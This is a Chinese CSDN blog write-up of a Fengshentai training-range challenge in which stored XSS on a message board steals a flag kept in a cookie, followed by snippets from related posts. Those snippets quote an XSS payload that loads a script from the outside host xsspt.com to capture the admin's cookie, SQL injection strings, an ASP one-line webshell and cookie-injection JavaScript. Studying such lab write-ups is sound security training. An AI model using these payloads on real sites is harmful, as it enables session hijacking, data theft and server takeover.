封神台 第三章 为了更多的权限,留言板!(Cookie)

最新推荐文章于 2022-12-26 09:38:05 发布
最新推荐文章于 2022-12-26 09:38:05 发布
阅读量655 收藏 2
点赞数 1
分类专栏: 封神台靶场 文章标签: 安全 web安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65712192/article/details/127378654
版权
"本文介绍了一种利用Web漏洞中的存储型XSS(跨站脚本攻击)来获取Cookie中隐藏信息的方法。通过创建XSS平台项目,复制并提交含有payload的代码,然后在平台上查看Cookie,成功获取了Flag:zkz{xsser-g00d}
摘要由CSDN通过智能技术生成

 封神台 https://hack.zkaq.cn

        本题主要是利用web漏洞中的存储型XSS漏洞,题目已经告诉flag在Cookie(储存在用户本地上的终端数据)里面。

        所以我们只需要一个XSS平台(xss.pt)就可以,注册建议不要写真实信息。

        具体操作如下:

1. 创建项目

 

 直接打开代码

2. 复制粘贴

3.提交留言

 

 4.返回到xss平台

 

 在cookie里面发现 flag=  zkz{xsser-g00d} 简单拿下

橙子学不会.
关注
专栏目录
基础工具运用:爆破管理员账户登录后台【配套课时:burp到支付和暴破 实战演练】
04-14 3228
神台第三章:爆破管理员账户登录后台【配套课时:burp到支付和暴破 实战演练】 题目: 第二关拿到密码后,虽然在admin路径中成功登录后台,但那竟然是一个假后台! 不过没关系,尤里也遇到过不少假后台,他决定换个思路入手,通过信息收集…… 它找到了女神的另一个购物网站,尤里决定从这个网站入手…… 一、登录爆破 1、http://59.63.200.79:8003/dami_999/dami_666/index.php首页右上角有个登录按钮,厉害了,点击登录 2、居然这么简单,直接..
神台靶场-第五章
Mr_helloword的博客
07-11 1881
第五章- 进击!拿到Web最高权限 Tips: 通过修改Cookie登录后台(没用重打) 2、上传SHELL!3、Flag在web根目录(flag.php) 3.上传图片时建议上传小文件,我建议用QQ表情。 来到传送门提示修改cookie,这里我们想到了第四关的flag-cookie信息如下,修改cookie信息,成功进入后台。 cookie:ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC 在存储里将上面的cookie值进行修改: 根据提示信息这
神台 第三章:为了多的权限留言板!【配套课时:cookie伪造目标权限 实战演练】
06-14 2634
题目 Tips: 1、存储型Xss 2、flag在cookie里,格式为zkz{..},xss bot 每10秒访问一次页面 3、自建Xss平台源码:http://www.zkaq.org/?t/99.html 经过一番操作,尤里虽然进入到后台,窃窃自喜的他不满足于此,作为黑阔他要挑战曾经的自己,他要攻克之前失手的网站! 他重新浏览之前的网站,这时他突然发现了一个留言板功能。而留言板管理员是每天都会去查阅的。 尤里开始动手…… 1.进入留言的页面,测试弹窗 发现弹框显示1,注入点为主题 ...
第三章:为了多的权限留言板
m0_51195235的博客
12-26 686
第三章:为了多的权限留言板
第三章:为了多的权限 留言板
m0_48294281的博客
12-31 1428
靶场学习心得,欢迎大家交流!
为了多的权限留言板
weixin_55129870的博客
05-11 406
URL:神台 - 掌控安全在线演练靶场,是一个在线黑客攻防演练平台。 (zkaq.cn) 测试是否存在xss漏洞 <script>alert(1111)</script> 成功弹窗,存在xss,由tips可知这题是一道存储型XSS偷取cookie的题目,既是存储型偷取cookie,就需要xss平台,找一个网上的xss平台,这里使用:XSS平台-XSS安全测试平台 (当管理员查看留言页面时触发xss,将管理员的cookie发送到该平台上面,从而实现利用管理员...
神台-第四章 为了多的权限留言板
ploto_cs的博客
09-27 1205
神台-第四章 为了多的权限留言板 1.进入留言的页面,测试弹窗 根据提示为存储型XSS 测试语句为 可以看到成功弹窗 2.搭建xss平台 随意注册一个账户 https://xsspt.com/index.php?do=login 配置前两个必须选 复制语句: </textarea>'"><script src=https://xsspt.com/ZIVFnr?1601173210></script> 3.测试新语句 4.在xss平台看截取
神台----尤里的复仇I-第二章:遇到阻难!绕过WAF过滤!
正在学习的路上...
07-18 3515
1.找注入点 进去之后,查看新闻,一般在这里有注入点。 输入 ?id=168 and 1=1 过滤了一些关键字,通过测试没有过滤 == order by == 2.猜列数、报显示位 通过测试,发现查询了10列 ?id=171 order by 10 ?id=466454 select 1,2 ------将id设为一个不存在的数,看显示位 3.查看数据库版本和当前数据库名 ?id=1...
神台靶场-第一章:为了女神小芳!【SQL注入攻击原理】
红凳子的博客
05-07 2079
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 神台靶场-第一章:为了女神小芳!【SQL注入攻击原理】前言判断是否存在SQL注入漏洞二、使用步骤1.引入库2.读入数据总结 前言 提示:通过sql注入拿到管理员密码! 尤里正在追女神小芳,在得知小芳开了一家公司后,尤里通过whois查询发现了小芳公司网站,学过一点黑客技术的他,想在女神面前炫炫技。于是他打开了传送门 判断是否存在SQL注入漏洞 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二
神台靶场,为了小芳,冲之——cookie注入
Wubuqing的博客
10-30 434
第二个靶场 打开网站 找一下注入点 一般在新闻这种里面点开看看 先判断是否存在注入 有waf 尝试了很多方法绕过都没成功,/and/,aandnd,AnD等一系列都没绕过去,乌鸡鲅鱼 删掉id=169 发现 然后判断cookie注入 在搜索框输入 Javascript:alert(document.cookie=”id=”+escape(‘169’)); 然后弹窗了(其中 “id=” 取决URL中的id= escape中的数值也是URL中id=的值)返回刚刚的页面,把ID删除后一样能正常显示。说明服务器能
登录别人的账户(仅在神台靶场).mp4
04-07
这个教程仅在神台靶场可用,如在其他网站使用,否则属于违法行为,后果自负,本教程仅做参考,真正攻破防火墙属于违法行为
神台----尤里的复仇I-第五章:进击!拿到Web最高权限
正在学习的路上...
07-18 1921
1.使用cookie进入后台 根据提示信息 需要用到上个关卡的cookie,去XSS平台拿到cookie,删去flag=zkz{****}, 点击之前,打开Burp,进行抓包,替换cookie 放行,进入后台页面。 2.找上传点 在产品管理-添加产品中可以上传图片。 上传带asp一句话的图片, asp一句话:<%eval request (“hacker”)%> 木马一般会被拦截...
神台----尤里的复仇I-第四章:为了多的权限留言板!!
正在学习的路上...
07-18 1096
本章主要是xss平台使用,很简单。 自己搭建xss平台或者网上随便找个平台注册使用。 新建个项目,建好后,将下面代码复制到留言板里。 提交,即可。去XSS平台接收消息。 提交,完成。 ...
神台靶场-第三章
Mr_helloword的博客
07-12 2287
第三章:爆破管理员账户登录后台 使用工具:御剑后台扫描,burpsuit 进入网站后想进入管理后台页面,试着在url地址后加/admin常试结果成功了,如果不成功再用工具扫描如下: 登陆后台后使用bp暴力破解模块爆破账户密码(这里我们知道账号密码就不具体演示了): 3.使用bp修改数量价格 flag ...
神台-第三章 爆破管理员账户登录后台
ploto_cs的博客
09-26 2865
神台-第三章 爆破管理员账户登录后台 1.探测真实登录网址 有题目可知,8004端口下admin是假后台,故使用御剑探测8004端口 2.探测可得,admin123才是真后台 3.使用上一章节爆破出的密码继续登录 账户:admin 密码:welcome 成功登录后可得 4.分析代码 ① 从请求头中拿到Referer,并赋值给ComeUrl。 ② 判断ComeUrl是否为空,若是空,则表明是直接输入地址访问。本题不允许 ③ ComeUrl不为空, 读取Host,并在前面拼接 http:// 赋值给cU
CTF神台第三关通关
weixin_49071539的博客
11-25 996
分析代码 ① 从请求头中拿到Referer,并赋值给ComeUrl。 ② 判断ComeUrl是否为空,若是空,则表明是直接输入地址访问。本题不允许 ③ ComeUrl不为空, 读取Host,并在前面拼接 http:// 赋值给cUrl,如果ComeUrl有 " : ",表明有端口号,在为cUrl 加上端口号。 步骤: 1.第二章admin是假后台 2.通过御剑扫描发现还存在一个admin123后台 3.利用第二章的密码可以进入后台 4.打开burp suite,后台点击左侧任意选项 5.查看 burp su
神台----尤里的复仇I-第三章:这个后台能识别登录者…
正在学习的路上...
07-18 1930
根据提示,真正的后台地址为admin123,输入上一关的账号、密码进去。 分析代码: 从请求头中拿到Referer,并赋值给ComeUrl。 判断ComeUrl是否为空,若是空,则表明是直接输入地址访问。本题不允许 ComeUrl不为空, 读取Host,并在前面拼接 http:// 赋值给cUrl,如果ComeUrl有 " : ",表明有端口号,在为cUrl 加上端口号。 最后判断cUrl和...
ctf实战 掌控安全的靶场 第三关通关记录
wh1te 小白的博客
09-20 3486
掌控安全神台第三关  根据题目可能要用burp进行抓包,点击传送门进入题目主页 之前题目说的扫描到新的后台地址admin123 在网址后加入admin123 进入新的后台管理页面 根据第二关得到的用户和密码进行登录  进入后得到这样一个页面 抓包结果如下 根据代码分析只需要修改host和referer的ip地址 修改以后结果还是进不去 分析一下问题  打开F...
神台 head注入1-3
weixin_46578840的博客
06-25 285
可以看到源代码只是对name和password做了过滤,但是全局变量user-agent是可控的 bp抓包修改user-agent头 1' and extaclvalue(1,concat(0x7e,(select database()),1)) and ' 1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),
c4d修神记:零基础到三维神 下载
最新发布
01-05
"c4d修神记:零基础到三维神"是一本关于学习Cinema 4D(简称C4D)软件的书籍。C4D是一款强大的三维建模、动画和渲染软件,广泛应用于电影、游戏、广告等领域。该书以零基础的读者为目标群体,旨在通过系统的教程和实例,帮助读者从初学者成长为能够独立完成三维设计与制作的专业人士。 该书提供了C4D软件的下载地址,读者可以通过该链接下载安装C4D软件到自己的电脑中。安装完成后,读者可以按照书中的指导步骤,逐步学习C4D的操作技巧和基本概念。从最基础的界面介绍、视图操作,到三维模型的建立、材质的添加、动画的制作等各个方面都有详细的讲解和实例演示。 随着阅读的深入,读者将学习到高级别的技巧和应用,如灯光设置、摄像机调整、特效制作等。作者通过生动的插图和实际案例,使读者能够好地理解并掌握C4D的使用方法。 "C4D修神记:零基础到三维神"不仅可以帮助读者快速入门C4D软件,还能够启迪读者的创作灵感,提供了丰富的设计思路和技巧。这本书的出版对于有志于学习和从事三维设计的读者来说是一次难得的机会和宝贵的参考资料。无论是对于初学者还是对于有一定基础的人士来说,这本书都能够带领他们迈向高的技能和创作水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值